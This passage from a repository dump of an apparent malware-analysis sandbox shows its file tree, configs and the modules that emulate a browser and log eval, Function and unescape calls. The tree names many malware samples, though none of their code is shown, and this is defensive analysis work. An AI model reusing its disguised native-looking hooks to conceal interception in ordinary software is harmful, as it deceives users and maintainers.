├── EXAMPLES.md ├── LICENSE ├── README.md ├── config.json ├── config_wscript_fileexists.json ├── config_wscript_only.json ├── cycle.js ├── env ├── agents.js ├── browser.js ├── console.js ├── eval.js ├── function.js ├── other.js ├── utils.js └── wscript.js ├── jailme.js ├── malware ├── 20160531 │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output │ ├── 8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output.no_download │ ├── README.md │ └── sandbox_dump_after.json ├── 20160929 │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out │ ├── 416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.txt │ ├── cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js │ └── cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out ├── 20161001 │ ├── README.md │ ├── a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js │ ├── a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out │ ├── cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js │ ├── cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.out │ ├── f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js │ └── f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.out ├── 20161002 │ ├── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js │ ├── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js.orig │ └── ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.out ├── 20161003 │ ├── 86943c7e77aac9a3db09def4cdd038f7707fde04d8af59245463dceef5cccc51.js │ └── 86943c7e77aac9a3db09def4cdd038f7707fde04d8af59245463dceef5cccc51.out ├── 20161005 │ ├── dbf6e041cf2431018b977f734db844a2d731dd25cc3debabbfcfa8c529ce2a77.js │ └── 
dbf6e041cf2431018b977f734db844a2d731dd25cc3debabbfcfa8c529ce2a77.out ├── 20161007 │ ├── 3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js │ └── 3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.out ├── 20161008 │ ├── 140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js │ └── 140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.out ├── 20161013 │ ├── 802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js │ ├── 802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out │ ├── _TMP__XipXkrLd.js │ ├── _TMP__XipXkrLd.js.out │ ├── _TMP__XipXkrLd.out │ └── out │ │ ├── malware_20161013__TMP__XipXkrLd.js │ │ ├── tr_malware_20161013__TMP__XipXkrLd.js │ │ ├── urls.json │ │ └── wmis.json ├── 20161019 │ ├── 7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.js │ └── 7698627e91bd2db3853b9604b710df43deadea9883ae97468a53d20a9601f2d1.out ├── 20161022 │ ├── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js │ ├── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.js.orig │ └── ece7520d2db75456ebd6f32b01fc79600bbbc2065dbc552bc6077eeaab346771.out ├── 20161028 │ ├── 353cfa4952a0199b538c6c389d15816430b422959e60b1becfb87463728eb550.js │ ├── 353cfa4952a0199b538c6c389d15816430b422959e60b1becfb87463728eb550.out │ ├── 7396e78d2ae93b29df342f7bdb67ef4f0b6860fb83ce4b14cc3e23613d636407.js │ ├── 7396e78d2ae93b29df342f7bdb67ef4f0b6860fb83ce4b14cc3e23613d636407.out │ ├── 7b7bd1e2bd63f233004045f8d3c743af41e0107765b703841b620253243a0732.js │ ├── 7b7bd1e2bd63f233004045f8d3c743af41e0107765b703841b620253243a0732.out │ ├── b49b7768b6afada37e9084918e1151a314c29be1728988bcbbc676936f1e7948.js │ ├── b49b7768b6afada37e9084918e1151a314c29be1728988bcbbc676936f1e7948.out │ ├── ddf5e00b01f5841f9ef582e4a9122f549438039ee100088b244c0fa5402a0f5f.js │ └── ddf5e00b01f5841f9ef582e4a9122f549438039ee100088b244c0fa5402a0f5f.out ├── 20161031 │ ├── sample.js │ ├── sample_nocatch.js │ └── 
sample_stage1.js ├── 20161210 │ ├── 24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.js │ └── 24c314dcfdfbfe984e7ca9e83a96f0aea1ac37cf92eab609f8d4916e6cde299e.out ├── 20161213 │ ├── sample.js │ └── sample.out ├── 20161214 │ ├── 5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.js │ └── 5cf27448bf9355692a0448f41f65da625e876e91c66cf6f0a7f7127aed08087b.out ├── 20161216 │ ├── README.md │ ├── malware.js │ ├── malware.out_download │ ├── malware.out_file_exists │ ├── malware.out_no_download │ ├── malware2.js │ ├── malware2.out_file_exists │ └── malware2.out_file_exists_trace ├── 20161227 │ ├── 01e4c87434e28a8838cfaf16b121e474512ca176efdcb0bba577fbbb2ddfc8c6.js │ ├── 06e9b62cfa79e8d6cbf2d650dd623c041822eff24e171867c0bf49a4b17d66b2.js │ ├── 18953b45756b4da58948cdc9dc3b4c5af333c4cadd6890bce5bc0fe1395ad63b.js │ ├── 2b2c85e2de6dbd4e1ff02d12018c871984387f6c428a1b515624a1a6b4c5ea00.js │ ├── 84d73512b431365e1650998199fa7673b6fbd290935fcb7a1fbf071359c1ab46.js │ ├── 911bc50c3fcfbd0a1293f5de2b33001d588aa9df4b9a9542880cfca1eaba10cf.js │ ├── 913edfa193769a34805c4b8fcdf8737bce7dc5326e6201217ce61bebc85135e6.js │ ├── 961e7da15919c2d4744bbe161f1db0daa99127e9311c0cfa4c217b7ffa0f33fe.js │ ├── 97d87081f0b8e890df0a1c8ae85332b673329d3f2a74f00f7be3b6cb8ce1fe2c.js │ ├── README.md │ ├── a35738f52720eb875932e65a3831611e6ba7447d40ab90476dff88833243d892.js │ ├── b84e2ced6c7628264e75d2fc5615b3b4a23c18df494618da347d2eebc90ecd80.js │ ├── c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.js │ ├── c0a73d4e21e60a370bbaa476f532a02df17e99e5be3389ff550d28c105d518cd.out │ ├── ca0daa0a2305e3576e2c74c8ad98d115a90642e14377508afaee2096b58bb0ab.js │ └── d0ee77a75a89b7a5ad7cc998526297208454de56f8a403d609d71c7f9ef10f80.js ├── 20170214 │ ├── 459867.3rdstage.bat │ ├── 459867.4thstage.ps1 │ ├── 459867.js │ ├── 459867.output │ ├── 459867.sandbox_dump_after.json │ ├── 459867_2ndstage.base64 │ ├── 459867_2ndstage.js │ ├── 459867_2ndstage.output │ ├── 796423.2ndstage.base64 │ 
├── 796423.2ndstage.js │ ├── 796423.2ndstage.output │ ├── 796423.3rdstage.bat │ ├── 796423.4thstage.ps1 │ ├── 796423.js │ ├── 796423.output │ └── 796423.sandbox_dump_after.json ├── 20170216 │ ├── index.html │ └── index.js ├── 20170329 │ └── fatura.js ├── 20170413 │ ├── 170413.js │ └── 170413.out ├── 20170504 │ ├── malware-20170504.1st_run.out │ ├── malware-20170504.js │ └── malware-20170504.out ├── 20170506 │ ├── 1.js │ └── 1.out ├── 20170804 │ └── RLbPRgWrsX.js ├── 20170924 │ ├── decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37.js │ ├── decd71ae3b5e683f0c3d057ac0576cbd624ca10734e1984f15cb77fcd23c4a37.out │ └── source.txt ├── 20171004 │ ├── C__Users_User_AppData_Local_Temp_UDqQmLVi2.exe │ ├── Function[14].js │ ├── Function[15].js │ ├── Function[16].js │ ├── Function[17].js │ ├── Function[20].js │ ├── Function[22].js │ ├── eval1.js │ ├── eval2.js │ ├── malware_20171004_pdf.js │ ├── pdf.js │ ├── pdf.js.out │ ├── t404 │ │ ├── Function[14].js │ │ ├── Function[15].js │ │ ├── Function[16].js │ │ ├── Function[17].js │ │ ├── Function[20].js │ │ ├── eval1.js │ │ ├── eval2.js │ │ ├── malware_20171004_pdf.js │ │ ├── pdf.js.out │ │ ├── sandbox_dump_after.json │ │ ├── tr_malware_20171004_pdf.js │ │ └── urls.json │ ├── tr_malware_20171004_pdf.js │ └── urls.json ├── 20171014 │ ├── malware.js │ ├── step1 │ │ └── malware.js.out │ ├── step2 │ │ └── malware.js.out │ └── step3 │ │ └── malware.js.out ├── 20180415 │ ├── DOC2460139368-PDF.js │ └── DOC2460139368-PDF.js.out ├── 20190808 │ ├── C__Users_User_AppData_Local_Temp__TempFile_20.tmp │ ├── jailme-output.txt │ ├── urls.json │ ├── Информация о заказе.2019-0807.docx.js │ └── Информация о заказе.2019-0807.docx.orig.js ├── README.md ├── angler │ ├── angler.js │ ├── angler_full.html │ ├── angler_output.txt │ └── angler_stripped.html ├── example.js └── example_browser.js ├── native_test ├── README.md ├── ado_recordset.js ├── ecma_call_object_as_fn.js └── wmi.js ├── output └── dummy ├── package.json └── test ├── 
hello-world.js ├── test_env.js └── wscript_test.js /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Hynek Petrak 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence1": [ "env/eval.js", "env/wscript.js" ], 3 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 4 | "env/function.js", "env/wscript.js", "env/browser.js", 5 | "env/agents.js","env/other.js", "env/console.js" ], 6 | "browser_type" : "IE8", 7 | "malware_files": [], 8 | "context_dump_after": "sandbox_dump_after.json", 9 | "save_files": "output/" 10 | } 11 | -------------------------------------------------------------------------------- /config_wscript_fileexists.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 3 | "env/function.js", "env/wscript.js", "env/other.js", 4 | "env/console.js" ], 5 | "malware_files": [], 6 | "context_dump_after": "sandbox_dump_after.json", 7 | "save_files": "output/", 8 | "stack_trace": false, 9 | "options" : { 10 | "FileAlwaysExists" : true 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /config_wscript_only.json: -------------------------------------------------------------------------------- 1 | { 2 | "sandbox_sequence": [ "env/utils.js", "env/eval.js", 3 | "env/function.js", "env/wscript.js", "env/other.js", 4 | "env/console.js" ], 5 | "malware_files": [], 6 | "context_dump_after": "sandbox_dump_after.json", 7 | "save_files": "output/" 8 | } 9 | -------------------------------------------------------------------------------- /cycle.js: -------------------------------------------------------------------------------- 1 | /* 2 | cycle.js https://github.com/douglascrockford/JSON-js 3 | 2015-02-25 4 | 5 | Public Domain. 6 | 7 | NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK. 8 | 9 | This code should be minified before deployment. 
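/*
See http://javascript.crockford.com/jsmin.html

USE YOUR OWN COPY. IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO
NOT CONTROL.
*/

/*jslint eval, for */

/*property
    $ref, apply, call, decycle, hasOwnProperty, length, prototype, push,
    retrocycle, stringify, test, toString
*/

if (typeof JSON.decycle !== 'function') {
    /**
     * Make a deep copy of an object or array in which each object or array
     * occurs at most once. Every later reference to an already-copied value
     * (including the references that form cycles) is replaced by {$ref: PATH},
     * where PATH is a JSONPath string locating the first occurrence: '$' is
     * the root and [NUMBER] / ["STRING"] select a member. So
     *     var a = []; a[0] = a;
     *     JSON.stringify(JSON.decycle(a))   // '[{"$ref":"$"}]'
     *
     * @param {*} object - the value to copy; non-objects come back unchanged
     * @returns {*} the de-cycled copy, safe to pass to JSON.stringify
     */
    JSON.decycle = function decycle(object) {
        'use strict';

        var objects = [];   // each unique object or array seen so far
        var paths = [];     // paths[i] is the JSONPath of objects[i]

        return (function derez(value, path) {
            // derez recurses through the value, producing the deep copy.
            var i;      // loop counter
            var name;   // property name
            var nu;     // the new object or array

            // typeof null === 'object', so go on only if this really is an
            // object, and not one of the boxed builtins.
            if (typeof value === 'object' && value !== null &&
                    !(value instanceof Boolean) &&
                    !(value instanceof Date) &&
                    !(value instanceof Number) &&
                    !(value instanceof RegExp) &&
                    !(value instanceof String)) {

                // Already encountered? Then emit a $ref instead of copying it
                // again. This is a linear search, so it gets slower as the
                // number of unique objects grows.
                for (i = 0; i < objects.length; i += 1) {
                    if (objects[i] === value) {
                        return {$ref: paths[i]};
                    }
                }

                // Otherwise remember the unique value together with its path.
                objects.push(value);
                paths.push(path);

                if (Object.prototype.toString.apply(value) === '[object Array]') {
                    nu = [];
                    for (i = 0; i < value.length; i += 1) {
                        nu[i] = derez(value[i], path + '[' + i + ']');
                    }
                } else {
                    nu = {};
                    for (name in value) {
                        if (Object.prototype.hasOwnProperty.call(value, name)) {
                            nu[name] = derez(value[name],
                                path + '[' + JSON.stringify(name) + ']');
                        }
                    }
                }
                return nu;
            }
            return value;
        }(object, '$'));
    };
}


if (typeof JSON.retrocycle !== 'function') {
    /**
     * Restore an object that was reduced by decycle: members whose value is of
     * the form {$ref: PATH} are replaced, in place, by the value found at PATH,
     * which re-creates the cycles. The argument is mutated and returned.
     *
     * PATH is resolved by eval() against the root, which is kept in `$`. Before
     * that, PATH must match a regexp that admits only a very restricted subset
     * of Goessner's JSONPath ('$' followed by [NUMBER] or ["string"] steps), so
     * nothing else reaches eval. The regexp contains nested * quantifiers,
     * which is known to perform badly on some engines for very long strings; a
     * PATH produced by decycle is expected to be short.
     *
     *     var s = '[{"$ref":"$"}]';
     *     JSON.retrocycle(JSON.parse(s));   // an array whose only element is itself
     *
     * @param {*} $ - parsed JSON produced by decycle
     * @returns {*} the same value, with references restored
     */
    JSON.retrocycle = function retrocycle($) {
        'use strict';

        // A \u escape inside a ["string"] step must be followed by exactly four
        // hex digits. The previous pattern also let other letters through, and
        // eval() then failed with a SyntaxError instead of the path being
        // skipped like any other malformed one.
        var px = /^\$(?:\[(?:\d+|\"(?:[^\\\"\u0000-\u001f]|\\([\\\"\/bfnrt]|u[0-9a-fA-F]{4}))*\")\])*$/;

        (function rez(value) {
            // rez walks recursively through the object looking for $ref
            // properties; each one whose value is a well-formed path is
            // replaced with the value found by that path.
            var i, item, name, path;

            if (value && typeof value === 'object') {
                if (Object.prototype.toString.apply(value) === '[object Array]') {
                    for (i = 0; i < value.length; i += 1) {
                        item = value[i];
                        if (item && typeof item === 'object') {
                            path = item.$ref;
                            if (typeof path === 'string' && px.test(path)) {
                                value[i] = eval(path);
                            } else {
                                rez(item);
                            }
                        }
                    }
                } else {
                    for (name in value) {
                        if (typeof value[name] === 'object') {
                            item = value[name];
                            if (item) {
                                path = item.$ref;
                                if (typeof path === 'string' && px.test(path)) {
                                    value[name] = eval(path);
                                } else {
                                    rez(item);
                                }
                            }
                        }
                    }
                }
            }
        }($));
        return $;
    };
}

// ---------------------------------------------------------------------------
// /env/agents.js
// ---------------------------------------------------------------------------
/*
agents.js - different browser agent strings

Each entry describes one emulated browser: the user-agent string plus the
`chrome` and `vendor` values that navigator-sniffing code commonly tests.
Keys starting with "_" are sandbox metadata, not browser properties.
*/

_agents = {
    "IE11_W10": {
        "_browser_type": "IE11 on Win10 64bit",
        "userAgent":
            //"Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko",
            "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko",
        "chrome": undefined,
        "vendor": ""
    },
    "IE8": {
        "_browser_type": "IE8 on Win10 64bit",
        "userAgent":
            //"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)",
            "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)",
        "chrome": undefined,
        "vendor": undefined
    },
    "IE7": {
        "_browser_type": "IE7 on Vista",
        "userAgent":
            //"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; .NET CLR 2.7.58687; SLCC2; Media Center PC 5.0; Zune 3.4; Tablet PC 3.6; InfoPath.3)",
            "Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 6.0; en-US)",
        "chrome": undefined,
        "vendor": undefined
    },
    "iPhone": {
        "_browser_type": "iPhone?",
        "userAgent": "Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/47.0.2526.70 Mobile/12B436 Safari/600.1.4 (000410)",
        "chrome": undefined,
        "vendor": "Apple"
    },
    "Firefox": {
        "_browser_type": "Firefox on Win10 64bit",
        "userAgent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0",
        "chrome": undefined,
        "vendor": ""
    },
    "Chrome": {
        "_browser_type": "Chrome on Win10 64bit",
        "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36",
        // A minimal window.chrome so that "is this Chrome?" checks succeed.
        "chrome": {
            "app": {},
            "csi": function() {},
            "loadTimes": function() {},
            "runtime": {},
            "webstore": {}
        },
        "vendor": "Google Inc."
    }
};

if (typeof exports !== 'undefined')
    exports._agents = _agents;

// Inside the browser emulation, expose the selected agent's members on
// window through logged getters/setters. `_browser_type` is expected to be
// provided by the runner (presumably from the config's "browser_type").
if (typeof window !== 'undefined' /*&& typeof window._props !== 'undefined'*/) {
    window._props = _agents[_browser_type];
    util_log("Setting Browser environment to:", window._props._browser_type);
    for (var k in window._props) {
        _defineProperty(window, k, window._props);
    }
    window.appVersion = window.userAgent;   // goes through the logged getter
}

// ---------------------------------------------------------------------------
// /env/console.js
// ---------------------------------------------------------------------------
// A logging stand-in for the browser console. Member names are lower-cased
// because _proxy falls back to a lower-cased lookup, so `console.timeEnd`
// resolves to `timeend`; the message text keeps the camelCase name.
console = _proxy({
    _name: "console",
    time: function(a) { util_log(this._name + ".time(" + a + ")"); },
    timeend: function(a) { util_log(this._name + ".timeEnd(" + a + ")"); },
    log: function(a) { util_log(this._name + ".log(" + a + ")"); },
    assert: function(a) { util_log(this._name + ".assert(" + a + ")"); },
    // Was ".clear" + a + ")" - the opening parenthesis was missing.
    clear: function(a) { util_log(this._name + ".clear(" + a + ")"); },
    count: function(a) { util_log(this._name + ".count(" + a + ")"); },
    dir: function(a) { util_log(this._name + ".dir(" + a + ")"); },
    dirxml: function(a) { util_log(this._name + ".dirxml(" + a + ")"); },
    // Was ".(" + a + ")" - the method name was missing from the log line.
    error: function(a) { util_log(this._name + ".error(" + a + ")"); },
    group: function(a) { util_log(this._name + ".group(" + a + ")"); },
    groupcollapsed: function(a) { util_log(this._name + ".groupCollapsed(" + a + ")"); },
    groupend: function(a) { util_log(this._name + ".groupEnd(" + a + ")"); },
    info: function(a) { util_log(this._name + ".info(" + a + ")"); },
    profile: function(a) { util_log(this._name + ".profile(" + a + ")"); },
    profileend: function(a) { util_log(this._name + ".profileEnd(" + a + ")"); },
    table: function(a) { util_log(this._name + ".table(" + a + ")"); },
    timestamp: function(a) { util_log(this._name + ".timeStamp(" + a + ")"); },
    trace: function(a) { util_log(this._name + ".trace(" + a + ")"); },
    warn: function(a) { util_log(this._name + ".warn(" + a + ")"); }
});
console.toString = () => { return "console" };

// ---------------------------------------------------------------------------
// /env/eval.js
// ---------------------------------------------------------------------------
util_log("Preparing sandbox to intercept eval() calls.");

/*
Replace the global eval with a logging wrapper. Every call is recorded in
_data["eval_calls"] as {orig, report_catch, safe_funcs}, and the source is
rewritten before it reaches the real eval:

  - each `catch (e) {` gets a util_log() call, so exceptions the script
    swallows still show up in the output;
  - IE conditional-compilation markers (cc_on, @if, @else, @elif, @end) are
    stripped, since the engine would otherwise fail to parse them;
  - `} var` becomes `}; var`.

The real eval is invoked through a variable, i.e. as an indirect eval, so the
evaluated code always runs in global scope rather than the caller's local
scope. These regex rewrites are heuristics for better visibility, not a
security boundary; the isolation comes from the context the sandbox runs in.
*/
eval = function() {
    var _eval_calls = [];
    _data["eval_calls"] = _eval_calls;
    var _orig_eval = eval;   // captured before the global is reassigned

    var _ = function(s) {
        var _t = {};
        _t["orig"] = s;

        var ns1 = s.replace(/\bcatch\b\s*\((.*?)\)\s*{/g, 'catch($1) { util_log(">>> Silencing catch " + _inspect($1));');
        _t["report_catch"] = ns1;

        // https://github.com/defconhaya proposal: turn declarations into
        // assignments. Recorded for analysis only - the executed text is ns1.
        var ns = ns1.replace(/function ([^ (]*)/g, "$1 = function");
        _t["safe_funcs"] = ns;
        _eval_calls.push(_t);

        // NOTE(review): these patterns match anywhere in a line, including
        // inside string literals (e.g. an e-mail address containing "@if"),
        // and delete to the end of the line - confirm that is acceptable.
        ns1 = ns1.replace(/\/\*@cc_on/gi, "");
        ns1 = ns1.replace(/@\*\//gi, "");
        ns1 = ns1.replace(/@if.*/gi, "");
        ns1 = ns1.replace(/@else.*/gi, "");
        ns1 = ns1.replace(/@elif.*/gi, "");
        ns1 = ns1.replace(/@end.*/gi, "");

        ns1 = ns1.replace(/\} *var\b/g, "}; var");

        util_log("Calling eval[" + _eval_calls.length + "]('" + _truncateOutput(ns1) + "')");
        return _orig_eval(ns1);
    };

    // The inline comment is part of the function's source text, presumably so
    // that toString() looks like a native function; keep it as is.
    return function eval(s) { /* [native code ] */ return _(s)};
}();

// ---------------------------------------------------------------------------
// /env/function.js
// ---------------------------------------------------------------------------
util_log("Preparing sandbox to intercept 'new Function()' calls.");
_Function_calls = {};   // "Function[N]" -> the arguments it was built from

/*
Replace the Function constructor with a wrapper that records each call and
injects logging into the body of the function it creates (its arguments and
`this` on entry, its return value on exit). The injected code refers to
util_log and _truncateOutput, which must therefore be globals in the context
where the new function runs.

NOTE(review): `_orig_Function = Function` relies on being evaluated as a
script in the sandbox context, where the hoisted `var Function` still aliases
the existing global; under a CommonJS module scope it would read undefined -
confirm against the runner.
*/
var Function = function() {
    _orig_Function = Function;
    _orig_Function.toString = () => {
        return "_orig_Function";
    };
    return function() {
        var _fn_id = _object_id++;
        var _name = "Function[" + _fn_id + "]";
        var args = Array.prototype.slice.call(arguments);
        _Function_calls[_name] = args;
        util_log("new Function(" + _truncateOutput(args.join(", ")) + ") => " + _name);

        // The last argument is the body, the rest are parameter names.
        // `new Function()` with no arguments now gets an empty body (and the
        // logging wrapper) instead of the literal text "undefined".
        var orig_body = args.length > 0 ? args[args.length - 1] : "";
        var orig_fn = "function(" + args.slice(0, -1).join(", ") + ") {" + orig_body + "}";
        var used_body = "var fn = " + orig_fn + "; var __my_ret = fn.apply(this, arguments); util_log(\"Returning: '\"+__my_ret+\"'\"); return __my_ret;";
        used_body = "util_log('Calling Function[" + _fn_id +
            "]('+_truncateOutput(Array.prototype.slice.call(arguments).join(\", \"))+') on ' + _truncateOutput(this));" + used_body;

        var new_args = args.slice(0, -1);
        new_args.push(used_body);
        return _orig_Function.apply(this, new_args);
    };
}();

Function.toString = () => {
    return "Function";
};

// ---------------------------------------------------------------------------
// /env/other.js
// ---------------------------------------------------------------------------
// Wrap unescape() so that every call and its result are kept for the dump.
_unescape_calls = [];
_unescape_retuns = [];   // (sic) - name kept, it may be read by the dump
if (typeof _orig_unescape === 'undefined') {
    _orig_unescape = unescape;
    _orig_unescape.toString = () => { return "_orig_unescape" };
}
unescape = function(s) {
    _unescape_calls.push(s);
    util_log("Calling unescape() no.:", _unescape_calls.length);
    var _r = _orig_unescape(s);
    _unescape_retuns[_unescape_calls.length - 1] = _r;
    return _r;
};
unescape.toString = () => { return "unescape" };

// ---------------------------------------------------------------------------
// /env/utils.js
// ---------------------------------------------------------------------------
/**
 * Log a stack trace labelled `t` without interrupting the caller.
 * @param {string} t - message placed in the Error that is inspected
 */
function _trace(t) {
    try {
        throw new Error(t);
    } catch (err) {
        util_log("Trace Non-" + _inspect(err));
    }
}

/**
 * Define `name` on `that` as a logged accessor pair backed by map[name].
 * Reads and writes are reported through util_log using that._name.
 * @param {object} that - object receiving the property
 * @param {string} name - property name (also the key read from `map`)
 * @param {object} map - backing store for the value
 */
var _defineProperty = function(that, name, map) {
    Object.defineProperty(that, name, {
        get: function() {
            util_log(that._name + "." + name + ".get() => " + _truncateOutput(map[name]));
            return map[name];
        },
        set: function(v) {
            util_log(that._name + "." + name + " = '" + _truncateOutput(v) + "'");
            map[name] = v;
        }
    });
};
_defineProperty.toString = () => {
    return "_defineProperty";
};

/**
 * Render `v` as a printable string of at most `max_len` characters, marking
 * truncation and replacing every non-printable-ASCII character with '?'.
 * @param {*} v - value to render; null/undefined are spelled out
 * @param {number} [max_len=250] - maximum length before " ... (truncated)"
 * @returns {string}
 * @throws re-throws anything v.toString() throws, after logging it
 */
var _truncateOutput = function(v, max_len = 250) {
    // TODO: make max_len a command line parameter
    try {
        if (v === null)
            return "null";
        if (typeof v === 'undefined')
            return "undefined";
        var vtrunc = "" + v.toString();
        if (vtrunc.length > max_len) {
            vtrunc = vtrunc.substring(0, max_len) + " ... (truncated)";
        }
        return vtrunc.replace(/[^\x20-\x7E]/g, '?');
    } catch (err) {
        util_log("Exception occured in _truncateOutput: " + _inspect(err));
        throw err;
    }
};
_truncateOutput.toString = () => {
    return "_truncateOutput";
};

/**
 * Define `name` on `that` as a logged accessor pair stored in that[intvar].
 * When `intvar` is omitted the backing slot is "_" + name, initialised to "".
 * Log lines include the type of the value read or written.
 * @param {object} that - object receiving the property
 * @param {string} name - property name
 * @param {string} [intvar] - name of the backing property on `that`
 */
var _defineSingleProperty = function(that, name, intvar) {
    if (typeof intvar === 'undefined') {
        intvar = "_" + name;
        that[intvar] = "";
    }

    Object.defineProperty(that, name, {
        get: function() {
            util_log(that._name + "." + name + ".get() => (" + typeof that[intvar] + ") '" + _truncateOutput(that[intvar]) + "'");
            return that[intvar];
        },
        set: function(v) {
            util_log(that._name + "." + name + " = (" + typeof v + ") '" + _truncateOutput(v) + "'");
            that[intvar] = v;
        }
    });
};
_defineSingleProperty.toString = () => {
    return "_defineSingleProperty";
};

var _proxy_verbose = false;   // not read here; kept for compatibility
var _proxy_options = {
    "dont_fail": true,   // unknown members are logged instead of throwing
    "verbose": false     // log every get/set/construct/apply
};

/**
 * Wrap an emulated object in a Proxy that (a) resolves member names exactly
 * and then case-insensitively via a lower-cased lookup (presumably because
 * WSH/COM scripts address members in any case), (b) reports members the
 * emulation lacks as ">>> FIXME" lines, or throws a TypeError when
 * _proxy_options.dont_fail is false, and (c) wraps constructed instances in
 * a proxy of their own.
 * @param {object} o - the emulated object; o._name is used in messages
 * @param {boolean} [verbose=false] - log reads of this proxy even when the
 *   global option is off (writes honour only the global option)
 * @param {string} [what] - label used instead of "Proxy.get: <target>"
 * @returns {Proxy}
 */
var _proxy = function(o, verbose = false, what = undefined) {
    // util_log("Creating proxy for " + o);
    var ret = new Proxy(o, {
        get: function(target, name) {
            var msg;
            var vname;
            var value;
            if (_proxy_options.verbose || verbose) {
                vname = typeof name === 'symbol' ? name.toString() : name;
                if (what) {
                    msg = what + "[" + vname + "]";
                } else {
                    msg = "Proxy.get: " + _truncateOutput(target.toString(), 50) + "[" + vname + "]";
                }
            }
            // Read the member once: getters defined through _defineProperty /
            // _defineSingleProperty log on every read, so reading it again for
            // the message would double the log lines.
            if (name in target) {
                value = Reflect.get(target, name);
                if (msg)
                    util_log(msg + " => " + value);
                return value;
            }
            if (typeof name === 'string') {
                var lcname = name.toLowerCase();
                if (lcname in target) {
                    // Log the value actually returned (the lower-cased member),
                    // not the non-existent original-cased one.
                    value = Reflect.get(target, lcname);
                    if (msg)
                        util_log(msg + " => " + value);
                    return value;
                }
            }
            value = Reflect.get(target, name);
            if (typeof name !== 'symbol') {
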